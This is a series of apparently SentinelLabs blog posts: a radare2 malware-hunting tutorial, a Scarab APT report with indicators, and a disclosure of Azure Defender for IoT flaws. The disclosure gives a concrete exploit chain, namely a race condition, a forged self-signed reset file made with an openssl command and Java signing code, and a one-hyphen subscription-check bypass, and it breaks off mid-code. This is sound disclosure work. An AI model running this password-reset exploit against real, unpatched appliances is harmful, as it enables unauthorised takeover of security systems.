At the beginning of this post I said that the answer to some of the challenges we would deal with today were “part Art and part Science”. We’ve done plenty of “the Science”, so I want to round out the post by talking a little about “the Art”. Let’s return to a topic we covered briefly earlier in this series – finding cross-references in r2 – and introduce a couple of handy tips that can make development of hunting rules a little easier.

When developing a hunting or detection rule for a malware family, we are trying to balance two opposing demands: we want our rule to be specific enough not to create false positives, but wide or general enough not to miss true positives. If we had perfect knowledge of all samples that ever had been or ever would be created for the family under consideration, that would be no problem at all, but that’s precisely the knowledge-gap that our rule is aiming to fill.

A common tip for writing YARA rules is to use something like a combination of strings, method names and imports to try to achieve this balance. That’s good advice, but sometimes malware is packed to have virtually none of these, or not enough to make them easily distinguishable. On top of that, malware authors can and do easily refactor such artifacts and that can make your rules date very quickly.

A supplementary approach that I often use is to focus on code logic that is less easy for authors to change and more likely to be re-used.

Let’s take a look at this sample of Adload written in Go. It’s a variant of a much more prolific version, also written in Google’s Golang. Both versions contain calls to a legitimate project found on GitHub, but this variant is missing one of the distinctive strings that made its more widespread cousin fairly easy to hunt.

A version of Adload that calls out to a popular project on Github

However, notice the URL at 0x7226. That could be interesting, but if we hunt on that domain name string alone in VirusTotal we only see 3 hits, so that’s way too tight for our rule.

Your rules won’t catch much if your strings are too specific
Let’s grab some bytes immediately after the C2 string is loaded

We might do better if we try grabbing bytes of code right after that string has been loaded, for while the URL string itself will certainly change, the code that consumes it might not. In this case, searching on 96 bytes from 0x7255 catches a more respectable 23 hits, but that still seems too low for a malware variant that has been circulating for many months.

Notice the dates – this malware has probably far more than just 23 samples

Let’s see if we can do better. One trick I find useful with r2 is to hunt down all the XREFs to a particular piece of code and then look at the calling functions for useful sequences of byte code to hunt on.

For example, you can use sf. to seek to the beginning of a function from a given address (assuming it’s part of a function, of course) and then use axg to get the path of execution to that function all the way from main(). You can use pds to give you a summary of the calls in any function along the way, which means combining axg and pds is a very good way to quickly move around a binary in r2 to find things of interest.

Using the axg command to trace execution path back to main
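What axg computes is essentially a path through the binary’s call graph between an entry point and the function we care about. A toy model of that idea (the graph and function names below are invented, and a real implementation walks cross-references rather than a hand-built dict):

```python
from collections import deque

# Breadth-first search for a call path from an entry point to a target
# function -- conceptually what `axg` reports for the current seek.
def call_path(graph, start, target):
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for callee in graph.get(path[-1], []):
            if callee not in seen:
                seen.add(callee)
                queue.append(path + [callee])
    return None

graph = {
    "entry0": ["sym.main.main"],
    "sym.main.main": ["sym.main.update", "sym.main.report"],
    "sym.main.update": ["sym.main.loadC2"],
}
print(call_path(graph, "entry0", "sym.main.loadC2"))
# ['entry0', 'sym.main.main', 'sym.main.update', 'sym.main.loadC2']
```

Each function on that path is a candidate source of reusable byte sequences to hunt on.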

Now that we can see the call graph to the C2 string, we can start hunting for logic that is more likely to be re-used across samples. In this case, let’s hunt for bytes where sym.main.main calls the function that loads the C2 URL at 0x01247a41.

Finding reusable logic that should be more general than individual strings

Grabbing 48 bytes from that address and hunting for it on VT gives us a much more respectable 45 TP hits. We can also see from VT that these files all have a common size, 5.33MB, which we can use as a further pivot for hunting.

Our hunt is starting to give better results, but don’t stop here!

We’ve made a huge improvement on our initial hits of 3 and then 23, but we’re not really done yet. If we keep iterating on this process, looking for reusable code rather than just specific strings, imports or method names, we’re likely to do much better, and by now you should have a solid understanding of how to do that using r2 to help you in your quest. All you need now, just like any good piece of malware, is a bit of persistence!


In this post, we’ve taken a look at some of r2’s lesser known features that are extremely useful for hunting malware families, both in terms of associating new samples to known families and in searching for unknown relations to a sample or samples we already have. If you haven’t checked out the previous posts in this series, have a look at Part 1, Part 2 and Part 3. If you would like us to cover other topics on r2 and reverse engineering macOS malware, ping me or SentinelLabs on Twitter with your suggestions.

Samples Used

File name SHA1
WizardUpdate_B1 2f70787faafef2efb3cafca1c309c02c02a5969b
WizardUpdate_B2 dfff3527b68b1c069ff956201ceb544d71c032b2
WizardUpdate_B3 814b320b49c4a2386809b0bdb6ea3712673ff32b
WizardUpdate_B4 6ca80bbf11ca33c55e12feb5a09f6d2417efafd5
WizardUpdate_B5 92b9bba886056bc6a8c3df9c0f6c687f5a774247
WizardUpdate_B6 21991b7b2d71ac731dd8a3e3f0dbd8c8b35f162c
WizardUpdate_B7 6e131dca4aa33a87e9274914dd605baa4f1fc69a
WizardUpdate_B8 dac9aa343a327228302be6741108b5279adcef17
Adload 279d5563f278f5aea54e84aa50ca355f54aac743

Chinese Threat Actor Scarab Targeting Ukraine

By: Tom Hegel
24 March 2022 at 16:05

Executive Summary

  • Ukraine CERT (CERT-UA) has released new details on UAC-0026, which SentinelLabs confirms is associated with the suspected Chinese threat actor known as Scarab.
  • The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.
  • Scarab has conducted a number of campaigns over the years, making use of a custom backdoor originally known as Scieron, which may be the predecessor to HeaderTip.
  • While technical specifics vary between campaigns, the actor generally makes use of phishing emails containing lure documents relevant to the target, ultimately leading to the deployment of HeaderTip.


On March 22nd 2022, CERT-UA published alert #4244, where they shared a quick summary and indicators associated with a recent intrusion attempt from an actor they dubbed UAC-0026. In the alert, CERT-UA noted the delivery of a RAR file archive "Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar", which translates to “On the preservation of video recordings of criminal actions of the army of the Russian Federation.rar”. Additionally, they note the archive contains an executable file, which opens a lure document, and drops the DLL file "officecleaner.dat" and a batch file "officecleaner". CERT-UA has named the malicious DLL ‘HeaderTip’ and notes similar activity was recorded in September 2020.

The UAC-0026 activity is the first public example of a Chinese threat actor targeting Ukraine since the invasion began. While there has been a marked increase in publicly reported attacks against Ukraine over the last week or so, all prior attacks have originated from Russian-backed threat actors.

Rough timeline of recent Ukrainian conflict cyber activity

Connection of HeaderTip to Scarab APT

Scarab has a relatively long history of activity based on open source intelligence. The group was first identified in 2015, and the associated IOCs are archived on OTX. As noted in the previous research, Scarab has operated since at least 2012, targeting a small number of individuals across the world, including in Russia, the United States, and elsewhere. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

During our review of the infrastructure and HeaderTip malware samples shared by CERT-UA, we identified relations between UAC-0026 and Scarab APT.

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group. An initial link can be made through the design of the malware samples and their associated loaders from at least 2020. Further relationships can be identified through the reuse of actor-unique infrastructure between the malware families associated with the groups:

  • 508d106ea0a71f2fd360fda518e1e533e7e584ed (HeaderTip – 2021)
  • 121ea06f391d6b792b3e697191d69dc500436604 (Scieron 2018)
  • dynamic.ddns[.]mobi (Reused C2 Server)

As noted in the 2015 reporting on Scarab, there are various indications the threat actor is Chinese speaking. Based on known targets since 2020, including those against Ukraine in March 2022, in addition to specific language use, we assess with moderate confidence that Scarab is Chinese-speaking and operating for geopolitical intelligence collection purposes.

Lure Documents

Analysis of lure documents used for initial compromise can provide insight into those being targeted and particular characteristics of their creator. For instance, in a September 2020 campaign targeting suspected Philippines individuals, Scarab made use of lure documents titled “OSCE-wide Counter-Terrorism Conference 2020”. For context, OSCE is the Organization for Security and Co-operation in Europe.

September 2020 Scarab APT Lure Document Content

More recently, industry colleagues have noted a case in which Scarab was involved in a campaign targeting European diplomatic organizations during the US withdrawal from Afghanistan.

The lure document reported by CERT-UA mimics the National Police of Ukraine, themed around the need to preserve video materials of crimes conducted by the Russian military.

Ukraine Targeting Lure Document

Lure documents through the various campaigns contain metadata indicating the original creator is using the Windows operating system in a Chinese language setting. This includes the system’s username set as “用户” (user).

Malware and Infrastructure

Multiple methods have been used to load the malware onto the target system. In the case of the 2020 documents, the user must enable document macros. In the most recent version from CERT-UA, the executable loader controls the install with the help of a batch file while also opening the lure document. The loader executable itself contains the PDF, the batch installer, and the HeaderTip malware as resource data.

The batch file follows a simple set of instructions to define the HeaderTip DLL, set persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and then execute HeaderTip. Exports called across the HeaderTip samples have been HttpsInit and OAService, as shown here.

officecleaner.bat File Contents
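Those three steps can be sketched as a pair of command lines. The following is a hypothetical reconstruction, not the actual officecleaner.bat: the value name, path, and use of reg/rundll32 are our own illustration of Run-key persistence plus an exported-entry-point launch.

```python
# Hypothetical reconstruction of the installer's steps described above.
# All names and paths here are invented for illustration.
def build_install_commands(dll_path: str, export: str) -> list:
    launch = f"rundll32.exe {dll_path},{export}"
    persist = (
        'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
        f'/v OfficeCleaner /t REG_SZ /d "{launch}" /f'
    )
    return [persist, launch]   # set persistence, then run once immediately

for cmd in build_install_commands("%APPDATA%\\officecleaner.dat", "HttpsInit"):
    print(cmd)
```

Anything written under that Run key is re-executed at every logon, which is all the persistence a small first-stage implant needs.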

The HeaderTip samples are 32-bit DLL files, written in C++, and roughly 9.7 KB. The malware itself will make HTTP POST requests to the defined C2 server using the user agent: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko". General functionality of HeaderTip is rather limited to beaconing outbound for updates, potentially so it can act as a simple first stage malware waiting for a second stage with more capabilities.
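The beacon shape described above can be modeled as follows; the URL and body are placeholders (we construct the request without sending it), but the user agent is the hardcoded string observed in the samples:

```python
from urllib.request import Request

# Hardcoded user agent observed in HeaderTip's HTTP POST beacons.
UA = ("Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) "
      "like Gecko")

# Placeholder URL and empty JSON body -- illustration only, never sent.
req = Request("http://example.invalid/update",
              data=b"{}",
              headers={"User-Agent": UA},
              method="POST")
print(req.get_method(), req.get_header("User-agent"))
```

An anomalous Trident/7.0 user agent POSTing to a dynamic DNS domain is a reasonable network-hunting pivot for this family.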

Scarab has repeatedly made use of dynamic DNS services, which means the C2 server IPs and subdomains should not automatically be considered related. In fact, some of the dynamic DNS services used by Scarab can easily be linked to various unrelated APT groups, such as those in the infamous CloudHopper report or the 2015 Bookworm malware blogs. While those may be associated with Chinese APTs, this likely indicates a standard operating toolkit and approach rather than shared technical resources.


We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group and represents the first publicly-reported attack on Ukraine from a non-Russian APT. The HeaderTip malware and associated phishing campaign utilizing Macro-enabled documents appears to be a first-stage infection attempt. At this point in time, the threat actor’s further objectives and motivations remain unclear.

Indicators of Compromise

IOC Description
product2020.mrbasic[.]com March 2022 C2 Server
8cfad6d23b79f56fb7535a562a106f6d187f84cf March 2022 Ukraine file delivery archive “Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar”
e7ef3b033c34f2ac2772c15ad53aa28599f93a51 March 2022 Loader Executable “officecleaner.dat”
fdb8de6f8d5f8ca6e52ce924a72b5c50ce6e5d6a March 2022 Ukraine lure document “#2163_02_33-2022.pdf”
4c396041b3c8a8f5dd9db31d0f2051e23802dcd0 March 2022 Ukraine batch file “officecleaner.bat”
3552c184281abcc14e3b941841b698cfb0ec9f1d March 2022 Ukraine HeaderTip sample “httpshelper.dll”
ebook.port25[.]biz September 2020 C2 Server
fde012fbcc65f4ab84d5f7d4799942c3f8792cc3 September 2020 file delivery archive “Joining Instructions IMPC 1.20 .rar”
e30a24e7367c4a82d283c7c68cff5739319aace9 September 2020 lure document “Joining Instructions IMPC 1.20 .xls”
5cc8ce82fc21add608277384dfaa8139efe8bea5 September 2020 HeaderTip samples based on C2 use
mert.my03[.]com September 2020 C2 Server
90c4223887f10f8f9c4ac61f858548d154183d9a September 2020 file delivery archive “OSCE-wide Counter-Terrorism Conference”
82f8c69a48fa1fa23ff37a0b0dc23a06a7cb6758 September 2020 lure document “OSCE-wide Counter-Terrorism Conference 2020”
b330cf088ba8c75d297d4b65bdbdd8bee9a8385c September 2020 HeaderTip sample “officecleaner.dll”
83c4a02e2d627b40c6e58bf82197e113603c4f87 HeaderTip (Possible researcher)
508d106ea0a71f2fd360fda518e1e533e7e584ed HeaderTip
dynamic.ddns[.]mobi C2 Server, overlaps with Scieron (b5f2cc8e8580a44a6aefc08f9776516a)

Pwning Microsoft Azure Defender for IoT | Multiple Flaws Allow Remote Code Execution for All

28 March 2022 at 17:59

By Kasif Dekel and Ronen Shustin (independent researcher)

Executive Summary

  • SentinelLabs has discovered a number of critical severity flaws in Microsoft Azure’s Defender for IoT affecting cloud and on-premise customers.
  • Unauthenticated attackers can remotely compromise devices protected by Microsoft Azure Defender for IoT by abusing vulnerabilities in Azure’s Password Recovery mechanism.
  • SentinelLabs’ findings were proactively reported to Microsoft in June 2021 and the vulnerabilities are tracked as CVE-2021-42310, CVE-2021-42312, CVE-2021-37222, CVE-2021-42313 and CVE-2021-42311 marked as critical, some with CVSS score 9.8.
  • Microsoft has released security updates to address these critical vulnerabilities. Users are encouraged to take action immediately.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.


Operational technology (OT) networks power many of the most critical aspects of our society; however, many of these technologies were not designed with security in mind and can’t be protected with traditional IT security controls. Meanwhile, the Internet of Things (IoT) is enabling a new wave of innovation with billions of connected devices, increasing the attack surface and risk.

The problem has not gone unnoticed by vendors, and many offer security solutions in an attempt to address it, but what if the security solution itself introduces vulnerabilities? In this report, we will discuss critical vulnerabilities found in Microsoft Azure Defender for IoT, a security product for IoT/OT networks by Microsoft Azure.

First, we show how flaws in the password reset mechanism can be abused by remote attackers to gain unauthorized access. Then, we discuss multiple SQL injection vulnerabilities in Defender for IoT that allow remote attackers to gain access without authentication. Ultimately, our research raises serious questions about the security of security products themselves and their overall effect on the security posture of vulnerable sectors.

Microsoft Azure Defender For IoT

Microsoft Defender for IoT is an agentless network-layer security solution for continuous IoT/OT asset discovery, vulnerability management, and threat detection that does not require changes to existing environments. It can be deployed fully on-premises or in Azure-connected environments.

Source: Microsoft Azure Defender for IoT architecture

This solution consists of two main components:

  • Microsoft Azure Defender For IoT Management – Enables SOC teams to manage and analyze alerts aggregated from multiple sensors into a single dashboard and provides an overall view of the health of the networks.
  • Microsoft Azure Defender For IoT Sensor – Discovers and continuously monitors network devices. Sensors collect ICS network traffic using passive (agentless) monitoring on IoT and OT devices. Sensors connect to a SPAN port or network TAP and immediately begin performing DPI (Deep packet inspection) on IoT and OT network traffic.

Both components can be either installed on a dedicated appliance or on a VM.

Deep packet inspection (DPI) is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

Defender for IoT Web Interface Attack Surface

Both the management and the sensor share roughly the same code base, with configuration changes to fit the purpose of the machine. This is the reason why both machines are affected by most of the same vulnerabilities.

The most appealing attack surface exposed on both machines is the web interface, which allows controlling the environment in an easy way. The sensor additionally exposes another attack surface which is the DPI service (horizon) that parses the network traffic.

After installing and configuring the management and sensors, we are greeted with the login page of the web interface.

The same credentials also serve as the login credentials for the SSH server, which gives us some more insight into how the system works. The first thing we want to do is obtain the sources to see what is happening behind the scenes, so how do we get those?

Defender for IoT is a product formerly known as CyberX, acquired by Microsoft in 2020. Looking around in the home directory of the “cyberx” user, we found the installation script and a tar archive containing the system’s encrypted files. Reading the script we found the command that decrypts the archive file. A minified version:

openssl enc -d -aes256 -in ./product.tar.gz -md sha512 -k <KEY> | tar xz -C <TARGET_DIR>

The decryption key is shared across all installations.
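For context, `openssl enc -k` does not use the passphrase directly: it derives the AES-256-CBC key and IV via OpenSSL’s EVP_BytesToKey scheme (here with `-md sha512`), using the 8-byte salt from the file’s "Salted__" header. A sketch of that derivation, with a placeholder passphrase since the real shared key is redacted:

```python
import hashlib

# EVP_BytesToKey with count=1 (the `openssl enc` default): key material
# is iterated digests of prev_digest || password || salt.
def evp_bytes_to_key(password: bytes, salt: bytes,
                     key_len: int = 32, iv_len: int = 16):
    material, block = b"", b""
    while len(material) < key_len + iv_len:
        block = hashlib.sha512(block + password + salt).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]

# Placeholder inputs -- NOT the product's actual shared key or salt.
key, iv = evp_bytes_to_key(b"not-the-real-key", b"\x00" * 8)
print(len(key), len(iv))  # 32 16
```

Because the derivation is deterministic, anyone holding the shared passphrase can decrypt any installation’s archive, which is exactly why a key shared across all installs is a weakness.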

After extracting the data, we found the sources for the web interface (written in Python) and got to work.

We first aimed to find any exposed unauthenticated APIs and look for vulnerabilities there.

Finding Potentially Vulnerable Controllers

The file contains the main routes for the web application:

xsense_routes = [
    ['handshake', XSenseHandshakeApiHandler],
]
xsense_v17_routes = [
    ['sync', xsense_v17.XSenseSyncApiHandler],
]
upgrade_v1_routes = [
    ['status', upgrade_v1.RemoteUpgradeStatusApiHandler],
    ['upgrade-log', upgrade_v1.RemoteUpgradeLogFileApiHandler],
]
token_v1_routes = [
    ['verify', token_v1.TokenVerificationHandlers],
    ['update-handshake', token_v1.UpdateHandshakeHandlers],
]
frontend_routes = [
    ['alerts', AlertsApiHandler],
    ['alerts/(?P<id>[0-9]*)', AlertsApiHandler],
    ['alerts/scenarios', AlertScenariosApiHandler],
]
management_routs = [
    ['backup/sync', ManagementApiHandler],
    ['backup/package', ManagementApiBackupHandler],
    ['backup/maintenance', MaintenanceApiHandler],
]

Using Jetbrains IntelliJ’s class hierarchy feature we can easily identify route controllers that do not require authentication.

Route controllers that do not require authentication

Every controller that inherits from BaseHandler and does not validate authentication or requires a secret token is a good candidate at this point. Some controllers drew our attention in particular.
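The same triage the IDE does for us can be modeled as a walk over BaseHandler’s subclass tree. The classes and the `requires_auth` attribute below are invented stand-ins for the product’s real authentication mechanism; this only illustrates the idea of flagging controllers that never opt in to authentication:

```python
# Toy model: find every BaseHandler subclass that does not require auth.
class BaseHandler:
    requires_auth = True

class AlertsApiHandler(BaseHandler):
    pass

class PasswordRecoveryApiHandler(BaseHandler):
    requires_auth = False

class ZipFileConfigurationApiHandler(BaseHandler):
    requires_auth = False

def unauthenticated_handlers(base):
    found, stack = [], list(base.__subclasses__())
    while stack:                         # walk the whole hierarchy
        cls = stack.pop()
        if not cls.requires_auth:
            found.append(cls.__name__)
        stack.extend(cls.__subclasses__())
    return sorted(found)

print(unauthenticated_handlers(BaseHandler))
# ['PasswordRecoveryApiHandler', 'ZipFileConfigurationApiHandler']
```

Not coincidentally, the two flagged here are the two controllers the rest of this post abuses.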

Understanding Azure’s Password Recovery Mechanism

The password recovery mechanism for both the management and sensor operates as follows:

  1. Access the management/sensor URL (e.g., https://ip/login#/dashboard).
  2. Go to the “Password Recovery” page.
  3. Copy the ApplianceID shown on this page into the Azure console to obtain a signed password reset ZIP file.
  4. Upload the signed ZIP file to the management/sensor Password Recovery page using the form mentioned in Step 2. This ZIP contains digitally-signed proof that the user is the owner of this machine, by way of digital certificates and signed data.
  5. A new password is generated and displayed to the user.

Under the hood:

  1. The actual process is divided into two requests to the management/sensor server:
    1. Upload of the signed ZIP proof
    2. Password recovery
  2. When a ZIP file is uploaded, it is extracted to the /var/cyberx/reset_password directory (handled by ZipFileConfigurationApiHandler).
  3. When a password recovery request is being processed, the server performs the following operations:
    1. The PasswordRecoveryApiHandler controller validates the certificates, verifying that they are properly signed by a root CA. In addition, it checks whether these certificates belong to Azure servers.
    2. A request is sent to an internal Tomcat server to further validate the properties of the machine.
    3. If all checks pass properly, PasswordRecoveryApiHandler generates a new password and returns it to the user.

The ZIP contains the following files:

  • IotDefenderSigningCertificate.pem – Azure public key, used to verify the data signature in ResetPassword.json, signed by issuer.pem.
  • Issuer.pem – Signs IotDefenderSigningCertificate.pem, signed by a trusted root CA.
  • ResetPassword.json – JSON application data, properties of the machine.

The content of the ResetPassword.json file looks as follows:

  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  "signature": "<BASE64_SIGNATURE>"

According to Step 2, the code that processes file uploads to the reset_password directory (components\xsense-web\cyberx_web\api\ looks as follows:

class ZipFileConfigurationApiHandler(BaseHandler):
    def _post(self):
        path = self.request.POST.get('path')
        approved_path = ['licenses', 'reset_password']
        if path not in approved_path:
            raise Exception("provided path is not approved")
        path = os.path.join('/var/cyberx', path)
        files = self.request.FILES
        for file_name in files:
            license_zip = files[file_name]
            zf = zipfile.ZipFile(license_zip)

As shown, the code extracts the user-delivered ZIP to the mentioned directory. The following code, from a cyberx Python library file, handles the password recovery requests:

class PasswordRecoveryApiHandler(BaseHandler):
    def _get(self):
        global host_id
        if not host_id:
            host_id = common.get_system_id()
            host_id = common.add_dashes(host_id)
        return {
            'instanceId': host_id
    def _post(self):
        print 'resetting user password'
        result = {}
            body = self.parse_body()
            user = body.get('user')
            if user != 'cyberx' and user != 'support':
                raise Exception('Invalid user')
            except Exception as e:
                logging.error('could not verify activation certificate, error {}'.format(e.message))
                result = {
                    "internalSystemErrorMessage": '',
                    "userDisplayErrorMessage": 'This password recovery file is invalid.' +
                                                  'Download a new file. If this does not work, contact support.'
            url = ""
            r =
            # Reset passwords
            user_new_password = common.generate_password()
            self._set_user_password(user, user_new_password)
            if not result:
                result = {
                    'newPassword': user_new_password
        return result

The function first validates the provided user and calls the function _try_reset_password:

 def _try_reset_password(self):
        license_signing_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, SIGNING_CERTIFICATE_FILE_NAME)
        intermediate_issuer_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, ISSUER_CERTIFICATE_FILE_NAME)
        cert_data = ssl.verify_certificate(intermediate_issuer_certificate_path, license_signing_certificate_path)
        certificate = load_certificate(FILETYPE_PEM, cert_data)
        print 'validating subject'
        print 'validating issuer'

Internally, this code validates the certificates, including the issuer.

Afterwards, a request to an internal API is made and handled by a Java component that eventually executes the following code:

public class ResetPasswordManager {
  private static final Logger LOGGER = LoggerFactory.getLogger(ResetPasswordManager.class);
  private static final String RESET_PASSWORD_CERTIFICATE_PATH = "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem"; 
  private static final String RESET_PASSWORD_JSON_PATH = "/var/cyberx/reset_password/ResetPassword.json";
  private static final ActivationConfiguration ACTIVATION_CONFIGURATION = new ActivationConfiguration();
  public static void resetPassword() throws Exception {"Trying to reset password");
    JSONObject resetPasswordJson = new JSONObject("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    DateTime issuanceDate = 
    if ( {
      LOGGER.error("Password reset file expired");
      throw new Exception("Password reset file expired");
    if (!Environment.getSensorUUID().replace("-", "").equals(resetPasswordProperties.getApplianceId().trim().toLowerCase().replace("-", ""))) {
      LOGGER.error("Appliance id not equal to real uuid");
      throw new Exception("Appliance id not equal to real uuid");

This code validates the password reset files yet again. This time it also validates the signature of the ResetPassword.json file and its properties.

If all goes well and the Java API returns 200 OK status code, the PasswordRecoveryApiHandler controller proceeds and generates a new password and returns it to the user.

Vulnerabilities in Defender for IoT

As shown, the password recovery mechanism consists of two main entities:

  • The Python web API (external)
  • The Java web API (tomcat, internal)

This introduces a time-of-check-time-of-use (TOCTOU) vulnerability, since no synchronization mechanism is applied.

As mentioned, the reset password mechanism starts with a ZIP file upload. This primitive lets us upload and extract any files to the /var/cyberx/reset_password directory.

There is a window of opportunity in this flow: the files in /var/cyberx/reset_password can be changed between the first verification (Python API) and the second verification (Java API). The Python API validates that the originally uploaded files are correctly signed by Azure certificates; the Java API then processes the replaced, specially crafted files, falsely approves their authenticity, and returns the 200 OK status code.
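A toy illustration of that check/swap/use window, with invented file names and contents (real exploitation swaps the uploaded ZIP contents between the two API calls):

```python
import os
import tempfile

d = tempfile.mkdtemp()
proof = os.path.join(d, "ResetPassword.json")

with open(proof, "w") as f:
    f.write("signed-by-azure")            # the legitimately signed upload

def check(path):                          # first verifier (Python API)
    return open(path).read() == "signed-by-azure"

assert check(proof)                       # check passes on the real proof

with open(proof, "w") as f:               # attacker re-uploads in the window
    f.write("self-signed-payload")

def use(path):                            # second component (Java API)
    return open(path).read()              # consumes the swapped file

print(use(proof))  # self-signed-payload
```

Because nothing locks the directory between the two steps, the second component happily operates on data the first one never saw.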

The password recovery Java API contains logical flaws that let specially-crafted payloads bypass all verifications.

The Java API validates the signature of the JSON file (same code as above):

JSONObject resetPasswordJson = new JSONObject("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");

The issue here is that, unlike the Python API, it does not verify the IotDefenderSigningCertificate.pem certificate itself; it only checks that the signature in the JSON file was produced by the attached certificate. This is a major flaw.

An attacker can therefore generate a self-signed certificate and sign the ResetPassword.json payload that will pass the signature verification.

As already mentioned, the ResetPassword.json looks like the following:

  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"

Afterwards, there is a subscription ID check:

  String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");

This is the only property that cannot be obtained by a remote attacker and is infeasible to guess in a reasonable time. However, this check can be easily bypassed.

The code takes the subscriptionId from the JSON file and compares it to the machineSubscriptionId. However, the code here is flawed: it checks whether machineSubscriptionId contains the subscriptionId from the user-controlled JSON file, not the other way around. This use of .contains() is entirely insecure. The subscriptionId is in the format of a GUID, which means it must contain a hyphen, so we can bypass this check by providing only a single hyphen character.
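The flawed comparison translates directly to Python’s `in` operator with the operands as written in the Java code (the machine ID below is a made-up GUID):

```python
# Mirror of the Java check: machineSubscriptionId.contains(userSupplied).
machine_subscription_id = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"

def subscription_check(user_supplied: str) -> bool:
    return (machine_subscription_id == "" or
            user_supplied in machine_subscription_id)

print(subscription_check("-"))          # True -- every GUID has hyphens
print(subscription_check("deadbeef"))   # False -- an honest guess fails
```

The correct check would be equality (or at least `user_supplied` containing the machine ID), which a single hyphen could never satisfy.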

Next, the issuanceDate is checked, followed by ApplianceId. This is already supplied to us by the password recovery page (mentioned in Step 2).

Now we understand that we can bypass all of the checks in the Java API, meaning we only need to win the race condition to ultimately reset the password without authorization.

The fact that the ZIP upload interface and the password recovery interface are separate came in handy in the exploitation phase and let us win the race more easily.

Preparing To Attack Azure Defender For IoT

To prepare the attack we need to do the following.

  1. Obtain a legitimate password recovery ZIP file from the Azure portal. Obviously, we cannot access the Azure user that the victim machine belongs to, but we can use any Azure user and generate a “dummy” ZIP file. We only need the recovery ZIP file to obtain a legitimate certificate. This can be done at the following URL:

    For that matter, we can create a new trial Azure account and generate a recovery file using that interface mentioned above. The secret identifier is irrelevant and may contain garbage.

  2. Then we need to generate a specially crafted (“bad”) ZIP file. This ZIP file will contain two files:
    • IotDefenderSigningCertificate.pem – a self-signed certificate. It can be generated by the following command:
      openssl req -x509 -nodes -newkey rsa:2048 -keyout key.pem -out IotDefenderSigningCertificate.pem -subj "/C=DE/ST=NRW/L=Berlin/O=My Inc/OU=ALEG/[email protected]"
    • ResetPassword.json – properties data JSON file, signed by the self-signed certificate mentioned above and modified accordingly to bypass the Java API verifications.

This JSON file can be signed using the following Java code:

import com.cyberx.infrastructure.common.configuration.ActivationConfiguration;
import com.cyberx.infrastructure.common.serializers.JsonSerializer;
import com.cyberx.infrastructure.common.utils.CryptographyUtils;
import com.cyberx.infrastructure.common.utils.FileUtils;
import com.cyberx.infrastructure.models.pojos.ResetPasswordProperties;

import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;

import org.apache.commons.codec.binary.Base64;
import org.joda.time.DateTime;
import org.joda.time.ReadableInstant;
import org.joda.time.format.DateTimeFormat;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

// Wrapper class added for completeness; the original listing showed only the method.
public class ResetPasswordSigner {
    public static void sign() {
        String data = "{\"tenantId\":\"<redacted>\",\"subscriptionId\":\"-\",\"type\":\"PasswordReset\",\"applianceId\":\"<redacted>\",\"issuanceDate\":\"06/19/2021\"}";
        try {
            // Sign the properties blob with the self-signed key generated above.
            String signature = Base64.encodeBase64String(CryptographyUtils.rsaSign("C:\\key.pem", data.getBytes()));
            JSONObject jsonData = new JSONObject(data);
            JSONObject completeData = new JSONObject();
            completeData.put("properties", jsonData);
            completeData.put("signature", signature);
            FileUtils.write("C:\\ResetPassword.json", completeData.toString());
        } catch (GeneralSecurityException e) {
            // ignored in the PoC
        } catch (IOException e) {
